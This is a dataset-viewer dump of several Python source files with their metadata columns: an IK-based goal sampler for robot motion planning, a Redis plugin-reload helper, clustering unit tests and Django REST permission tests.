            # (kept 0.01 rad away from both joint limits)
            q_goal[self.free_dof_idx] = random.uniform(self.dof_limits[self.free_dof_idx][0]+0.01, self.dof_limits[self.free_dof_idx][1]-0.01)
            # Normalize the free joint value to [0, 1] as the IK solver expects.
            freevalues = [ (q_goal[self.free_dof_idx]-self.dof_limits[self.free_dof_idx][0])/(self.dof_limits[self.free_dof_idx][1]-self.dof_limits[self.free_dof_idx][0]) ]
            # random torso joint value
            q_goal[self.torso_0_joint_idx] = random.uniform(self.dof_limits[self.torso_0_joint_idx][0]+0.01, self.dof_limits[self.torso_0_joint_idx][1]-0.01)
            self.openrave.robot_rave.SetDOFValues(q_goal, self.dof_indices)
            solutions = self.openrave.findIkSolutions(T_B_Ed, man_name=self.gripper+"_arm", freevalues=freevalues, filter_options=0)
            if len(solutions) == 0:
                continue
            goal_list = []
            for sol in solutions:
                # random pose of the jar
                # Copy the IK solution into the arm joints of the goal vector.
                for arm_dof_idx in range(len(self.dof_names_ik)):
                    dof_name = self.dof_names_ik[arm_dof_idx]
                    q_goal[self.dof_indices_map[dof_name]] = sol[arm_dof_idx]
                if shortest_path_len == None:
                    # No distance bound: sample the remaining joints uniformly
                    # within their limits (minus a small margin).
                    for i in range(len(self.dof_names)):
                        if i in self.ignore_dof:
                            continue
                        q_goal[i] = random.uniform(self.dof_limits[i][0]+0.01, self.dof_limits[i][1]-0.01)
                else:
                    # Distance bound: the ignored (IK/torso) joints already fix
                    # part of the distance budget; sample the other joints in a
                    # ball of the remaining radius around start_q.
                    diff = 0.0
                    for dof_idx in self.ignore_dof:
                        diff += (start_q[dof_idx] - q_goal[dof_idx]) * (start_q[dof_idx] - q_goal[dof_idx])
                    shortest_path_len2 = shortest_path_len*shortest_path_len - diff
                    if shortest_path_len2 < 0.0:
                        continue
                    shortest_path_len2 = math.sqrt(shortest_path_len2)
                    q_goal2 = tree.uniformInBall(shortest_path_len2, self.dof_limits, start_q, ignore_dof=self.ignore_dof)
                    # Re-impose the IK/torso joint values on the sampled point.
                    for dof_idx in self.ignore_dof:
                        q_goal2[dof_idx] = q_goal[dof_idx]
                    q_goal = q_goal2
                # sanity check
                if shortest_path_len != None and np.linalg.norm(q_goal-start_q) > shortest_path_len:
                    print "ERROR: np.linalg.norm(q_goal-start_q) > shortest_path_len", np.linalg.norm(q_goal-start_q), ">", shortest_path_len
                    exit(0)
                self.goals_T_B_E.append(T_B_Ed)
                goal_list.append(q_goal)
            if len(goal_list) > 0:
                return goal_list
        return None
| 40.052466
| 196
| 0.592481
| 5,427
| 38,170
| 3.84743
| 0.078496
| 0.068391
| 0.05431
| 0.03908
| 0.770163
| 0.742241
| 0.728448
| 0.704167
| 0.685489
| 0.661973
| 0
| 0.031056
| 0.303196
| 38,170
| 952
| 197
| 40.094538
| 0.753995
| 0.081504
| 0
| 0.708219
| 0
| 0
| 0.07211
| 0.004259
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0.00137
| 0.016438
| null | null | 0.009589
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
b8a24583e4c292fb265700934a95fa58cbfcb640
| 182
|
py
|
Python
|
posthog/plugins/reload.py
|
dorucioclea/posthog
|
a7e792c3fc5c1abc70d8167e1ead12d4ea24f17a
|
[
"MIT"
] | 7,409
|
2020-02-09T23:18:10.000Z
|
2022-03-31T22:36:25.000Z
|
posthog/plugins/reload.py
|
dorucioclea/posthog
|
a7e792c3fc5c1abc70d8167e1ead12d4ea24f17a
|
[
"MIT"
] | 5,709
|
2020-02-09T23:26:13.000Z
|
2022-03-31T20:20:01.000Z
|
posthog/plugins/reload.py
|
dorucioclea/posthog
|
a7e792c3fc5c1abc70d8167e1ead12d4ea24f17a
|
[
"MIT"
] | 647
|
2020-02-13T17:50:55.000Z
|
2022-03-31T11:24:19.000Z
|
from django.conf import settings
from posthog.redis import get_client
def reload_plugins_on_workers():
    """Ask every worker process to reload its plugins.

    Broadcasts a message on the shared Redis pub/sub channel that the
    workers subscribe to; the payload itself carries no data.
    """
    redis_client = get_client()
    redis_client.publish(settings.PLUGINS_RELOAD_PUBSUB_CHANNEL, "reload!")
| 22.75
| 75
| 0.813187
| 25
| 182
| 5.6
| 0.68
| 0.128571
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.104396
| 182
| 7
| 76
| 26
| 0.858896
| 0
| 0
| 0
| 0
| 0
| 0.038462
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.25
| true
| 0
| 0.5
| 0
| 0.75
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
b8a35a73f8e1b31688684ee6cb2a32481ed20b5c
| 5,025
|
py
|
Python
|
tests/unit/analytics/heatmap/test_cluster.py
|
thehyve/Fractalis
|
5591112e5bc994eea5baf3d28caa7e5dfee85a57
|
[
"Apache-2.0"
] | 7
|
2018-06-01T12:17:26.000Z
|
2019-08-23T13:15:34.000Z
|
tests/unit/analytics/heatmap/test_cluster.py
|
thehyve/Fractalis
|
5591112e5bc994eea5baf3d28caa7e5dfee85a57
|
[
"Apache-2.0"
] | 6
|
2018-11-02T10:00:04.000Z
|
2021-09-13T14:15:36.000Z
|
tests/unit/analytics/heatmap/test_cluster.py
|
LCSB-BioCore/Fractalis
|
a9f7f8da7675b55c5996d2f32d7baa7313b0350e
|
[
"Apache-2.0"
] | 3
|
2018-08-02T16:42:50.000Z
|
2018-12-14T18:16:22.000Z
|
"""This module provides tests for the cluster task
within the heatmap workflow."""
import pytest
from fractalis.analytics.tasks.heatmap.cluster import ClusteringTask
# noinspection PyMissingOrEmptyDocstring,PyMethodMayBeStatic
class TestClustering:
    """Unit tests for ClusteringTask.main (hclust and kmeans algorithms)."""

    task = ClusteringTask()
    # Columns 'A' and 'C' are similar while 'B' is an outlier; likewise rows
    # 'a' and 'c' cluster together while 'b' stands apart.
    df = {
        'A': {
            'a': 50,
            'b': 2,
            'c': 45
        },
        'B': {
            'a': 250,
            'b': 5,
            'c': 300
        },
        'C': {
            'a': 55,
            'b': 4,
            'c': 60
        }
    }

    def test_hclust_raises_with_invalid_param_1(self):
        with pytest.raises(ValueError) as e:
            options = {
                'method': 'abc',
                'metric': 'euclidean',
                'n_row_clusters': 2,
                'n_col_clusters': 2
            }
            self.task.main(df=self.df, cluster_algo='hclust', options=options)
        # FIX: check the exception message, not the ExceptionInfo wrapper —
        # `'x' in e` is not a valid membership test on ExceptionInfo.
        assert 'Invalid method' in str(e.value)

    def test_hclust_raises_with_invalid_param_2(self):
        with pytest.raises(ValueError) as e:
            options = {
                'method': 'single',
                'metric': 'abc',
                'n_row_clusters': 2,
                'n_col_clusters': 2
            }
            self.task.main(df=self.df, cluster_algo='hclust', options=options)
        assert 'Invalid metric' in str(e.value)

    def test_hclust_raises_with_invalid_param_3(self):
        # 'n_col_clusters' is deliberately missing.
        with pytest.raises(ValueError) as e:
            options = {
                'method': 'single',
                'metric': 'abc',
                'n_row_clusters': 2,
            }
            self.task.main(df=self.df, cluster_algo='hclust', options=options)
        assert 'mandatory parameters' in str(e.value)

    def test_hclust_can_handle_identical_cluster_size(self):
        # Two columns per cluster: (A, C) small values, (B, D) large values.
        df = {
            'A': {
                'a': 5, 'b': 10
            },
            'B': {
                'a': 500, 'b': 550
            },
            'C': {
                'a': 5, 'b': 10
            },
            'D': {
                'a': 500, 'b': 550
            }
        }
        options = {
            'method': 'single',
            'metric': 'euclidean',
            'n_row_clusters': 2,
            'n_col_clusters': 2
        }
        result = self.task.main(df=df, cluster_algo='hclust', options=options)
        assert ['B', 'D', 'A', 'C'] == [x[0] for x in result['col_clusters']]
        assert [0, 0, 1, 1] == [x[1] for x in result['col_clusters']]

    def test_hclust_returns_valid_result(self):
        options = {
            'method': 'single',
            'metric': 'euclidean',
            'n_row_clusters': 2,
            'n_col_clusters': 2
        }
        result = self.task.main(df=self.df,
                                cluster_algo='hclust', options=options)
        assert 'row_clusters' in result
        assert 'col_clusters' in result
        assert ['a', 'c', 'b'] == [x[0] for x in result['row_clusters']]
        assert ['A', 'C', 'B'] == [x[0] for x in result['col_clusters']]
        assert [0, 0, 1] == [x[1] for x in result['col_clusters']]
        # FIX: the original asserted col_clusters twice; the second assertion
        # was meant to cover the row cluster labels.
        assert [0, 0, 1] == [x[1] for x in result['row_clusters']]

    def test_kmean_raises_with_invalid_param_1(self):
        with pytest.raises(ValueError) as e:
            options = {
                'n_row_centroids': 2,
                'n_col_centroids': 'abc'
            }
            self.task.main(df=self.df, cluster_algo='kmeans', options=options)
        assert 'invalid' in str(e.value)

    def test_kmean_raises_with_invalid_param_2(self):
        # 'n_col_centroids' is deliberately missing.
        with pytest.raises(ValueError) as e:
            options = {
                'n_row_centroids': 2,
            }
            self.task.main(df=self.df, cluster_algo='kmeans', options=options)
        assert 'mandatory parameters' in str(e.value)

    def test_kmeans_can_handle_identical_cluster_size(self):
        df = {
            'A': {
                'a': 5, 'b': 10
            },
            'B': {
                'a': 500, 'b': 550
            },
            'C': {
                'a': 5, 'b': 10
            },
            'D': {
                'a': 500, 'b': 550
            }
        }
        options = {
            'n_row_centroids': 2,
            'n_col_centroids': 2
        }
        result = self.task.main(df=df, cluster_algo='kmeans', options=options)
        assert [0, 0, 1, 1] == [x[1] for x in result['col_clusters']]

    def test_kmean_returns_valid_result(self):
        options = {
            'n_row_centroids': 2,
            'n_col_centroids': 2
        }
        result = self.task.main(df=self.df,
                                cluster_algo='kmeans', options=options)
        assert 'row_clusters' in result
        assert 'col_clusters' in result
        assert ['a', 'c', 'b'] == [x[0] for x in result['row_clusters']]
        assert ['A', 'C', 'B'] == [x[0] for x in result['col_clusters']]
        assert [0, 0, 1] == [x[1] for x in result['col_clusters']]
        # FIX: same copy-paste issue as in the hclust test — check row labels.
        assert [0, 0, 1] == [x[1] for x in result['row_clusters']]
| 32.006369
| 78
| 0.478209
| 573
| 5,025
| 4.008726
| 0.141361
| 0.071833
| 0.028733
| 0.057466
| 0.866783
| 0.845015
| 0.845015
| 0.814105
| 0.808446
| 0.745755
| 0
| 0.033646
| 0.384876
| 5,025
| 156
| 79
| 32.211538
| 0.709479
| 0.027065
| 0
| 0.601449
| 0
| 0
| 0.146426
| 0
| 0
| 0
| 0
| 0
| 0.144928
| 1
| 0.065217
| false
| 0
| 0.014493
| 0
| 0.101449
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
b230449f2c2832e38b3ca42aab18a9837b403f9c
| 5,676
|
py
|
Python
|
tests/testsuite/test_views/test_mixin.py
|
hemache/django-rest-framework-rules
|
fc5fd42a946cba24be4768f5769410578f2ad5a8
|
[
"MIT"
] | null | null | null |
tests/testsuite/test_views/test_mixin.py
|
hemache/django-rest-framework-rules
|
fc5fd42a946cba24be4768f5769410578f2ad5a8
|
[
"MIT"
] | null | null | null |
tests/testsuite/test_views/test_mixin.py
|
hemache/django-rest-framework-rules
|
fc5fd42a946cba24be4768f5769410578f2ad5a8
|
[
"MIT"
] | null | null | null |
from __future__ import absolute_import
import rules
from django.contrib.auth.models import User
from django.core.exceptions import ImproperlyConfigured
from django.core.urlresolvers import reverse
from rest_framework.test import APITestCase
from testapp.models import Book
from testapp import views
class PermissionRequiredMixedAPIViewTests(APITestCase):
    """Tests the behavior of the mixin when used on an APIView
    """
    def test_user_with_permission_gets_access(self):
        user = User.objects.get(username='anton')
        permissions = views.SinglePermissionView().get_permission_required()
        # Precondition: this user holds every required permission.
        self.assertTrue(all([user.has_perm(perm) for perm in permissions]))
        self.assertTrue(self.client.login(username='anton', password='secr3t'))
        response = self.client.get(reverse('single_permission_view'))
        self.assertEqual(200, response.status_code)

    def test_user_without_permission_gets_no_access(self):
        user = User.objects.get(username='beatrix')
        permissions = views.SinglePermissionView().get_permission_required()
        # Precondition: at least one required permission is missing.
        self.assertTrue(any([not user.has_perm(perm) for perm in permissions]))
        self.assertTrue(self.client.login(username='beatrix', password='secr3t'))
        response = self.client.get(reverse('single_permission_view'))
        self.assertEqual(403, response.status_code)

    def test_user_with_permissions_gets_access(self):
        user = User.objects.get(username='anton')
        permissions = views.MultiplePermissionsView().get_permission_required()
        self.assertTrue(all([user.has_perm(perm) for perm in permissions]))
        self.assertTrue(self.client.login(username='anton', password='secr3t'))
        response = self.client.get(reverse('multiple_permissions_view'))
        self.assertEqual(200, response.status_code)

    def test_user_with_partial_permissions_gets_no_access(self):
        user = User.objects.get(username='beatrix')
        permissions = views.MultiplePermissionsView().get_permission_required()
        self.assertTrue(any([not user.has_perm(perm) for perm in permissions]))
        self.assertTrue(self.client.login(username='beatrix', password='secr3t'))
        response = self.client.get(reverse('multiple_permissions_view'))
        self.assertEqual(403, response.status_code)

    def test_user_without_permissions_gets_no_access(self):
        user = User.objects.get(username='carlos')
        permissions = views.MultiplePermissionsView().get_permission_required()
        # Precondition: this user holds none of the required permissions.
        self.assertTrue(all([not user.has_perm(perm) for perm in permissions]))
        self.assertTrue(self.client.login(username='carlos', password='secr3t'))
        response = self.client.get(reverse('multiple_permissions_view'))
        self.assertEqual(403, response.status_code)

    def test_improperly_configured_api_view_raises(self):
        with self.assertRaises(ImproperlyConfigured):
            # FIX: dropped the unused `response =` binding (flake8 F841);
            # only the raised exception matters here.
            self.client.get(reverse('improperly_configured_api_view'))
class PermissionRequiredMixedGenericAPIViewTests(APITestCase):
    """Tests the behavior of the mixin when used on a GenericAPIView
    """
    def test_object_permission_falls_back_to_required_permissions(self):
        view = views.GenericViewWithoutObjectPermissions()
        # FIX: assertEquals is a deprecated alias (removed in Python 3.12);
        # use assertEqual instead.
        self.assertEqual(None, view.object_permission_required)
        self.assertEqual(view.get_permission_required(),
                         view.get_object_permission_required())

    def test_user_with_object_permission_gets_access_to_object(self):
        user = User.objects.get(username='anton')
        permissions = views.SinglePermissionGenericView().get_object_permission_required()
        # Precondition: this user holds every required object permission.
        self.assertTrue(all([user.has_perm(perm) for perm in permissions]))
        self.assertTrue(self.client.login(username='anton', password='secr3t'))
        response = self.client.post(reverse('single_permission_generic_view', args=(1,)))
        self.assertEqual(200, response.status_code)

    def test_user_with_object_permissions_gets_access_to_object(self):
        user = User.objects.get(username='anton')
        permissions = views.MultiplePermissionsGenericView().get_object_permission_required()
        self.assertTrue(all([user.has_perm(perm) for perm in permissions]))
        self.assertTrue(self.client.login(username='anton', password='secr3t'))
        response = self.client.post(reverse('multiple_permissions_generic_view', args=(1,)))
        self.assertEqual(200, response.status_code)

    def test_user_with_partial_object_permissions_gets_no_access_to_object(self):
        user = User.objects.get(username='beatrix')
        view = views.MultiplePermissionsGenericView()
        permissions = view.get_object_permission_required()
        obj = view.queryset.get(pk=1)
        # Precondition: at least one object permission is missing for obj.
        self.assertTrue(any([not user.has_perm(perm, obj) for perm in permissions]))
        self.assertTrue(self.client.login(username='beatrix', password='secr3t'))
        response = self.client.post(reverse('multiple_permissions_generic_view', args=(1,)))
        self.assertEqual(403, response.status_code)

    def test_user_without_object_permission_gets_no_access_to_object(self):
        user = User.objects.get(username='carlos')
        view = views.MultiplePermissionsGenericView()
        permissions = view.get_object_permission_required()
        obj = view.queryset.get(pk=1)
        self.assertTrue(all([not user.has_perm(perm, obj) for perm in permissions]))
        self.assertTrue(self.client.login(username='carlos', password='secr3t'))
        response = self.client.post(reverse('multiple_permissions_generic_view', args=(1,)))
        self.assertEqual(403, response.status_code)
| 48.512821
| 93
| 0.735201
| 665
| 5,676
| 6.043609
| 0.147368
| 0.047275
| 0.044787
| 0.042548
| 0.792983
| 0.771585
| 0.771585
| 0.76412
| 0.746952
| 0.72207
| 0
| 0.00879
| 0.15821
| 5,676
| 116
| 94
| 48.931034
| 0.832357
| 0.021494
| 0
| 0.611765
| 0
| 0
| 0.07909
| 0.050199
| 0
| 0
| 0
| 0
| 0.352941
| 1
| 0.129412
| false
| 0.105882
| 0.094118
| 0
| 0.247059
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 6
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.